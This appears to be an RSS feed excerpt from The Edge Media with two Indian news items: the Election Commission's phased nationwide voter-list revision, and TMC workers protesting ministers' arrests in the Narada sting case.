The post Election Commission Set to Launch Nationwide Voters’ List Cleanup — First Phase to Cover 10–15 States appeared first on The Edge Media.
]]>The initial phase will focus on states heading to the polls in 2026, including Assam, Tamil Nadu, Kerala, Puducherry, and West Bengal. The exercise aims to ensure a more accurate and transparent electoral roll by removing duplicates, correcting errors, and adding new eligible voters.
Officials said the Commission will avoid conducting SIR in states where local body elections are underway or imminent, as local poll machinery remains occupied. Those states will be covered in later phases of the nationwide cleanup.
In Bihar, where the revision process has already concluded, the final voters’ list with 7.42 crore names was published on September 30. The state heads for elections in two phases on November 6 and 11, with counting scheduled for November 14.
The ECI has already held two national conferences with Chief Electoral Officers (CEOs) to finalize the roadmap for the massive update drive. Several states have already uploaded their most recent voters’ lists on official websites, while others prepare for fresh revisions.
Notably, the Delhi CEO’s website still hosts the 2008 voter list, the last time a full-scale intensive revision was carried out in the national capital.

]]>The post Hundreds of TMC workers protest against the ministers’ arrest appeared first on The Edge Media.
]]>This comes in after 4 of the TMC leaders Firhad Hakim, Subrata Mukherjee, Madan Mitra, and Sovan Chatterjee were arrested in connection to the Narada Sting Operation. Following this, Mamta Banerjee also reached the CBI office and challenged them to arrest her as well since she claims the arrest was illegal. Later, the court granted bail to all 4 of them.

The Narada Sting Operation was a series of secret tapes recorded by Mathew Samuel of Narada TV News channel in 2014. It shows 12 TCM leaders and an IPS officer taking bribes. Even though it was recorded in 2014, it was released in 2016 only before the assembly elections despite which TMC was able to win the elections. Later, a CBI probe was ordered by the Calcutta High court in 2017.
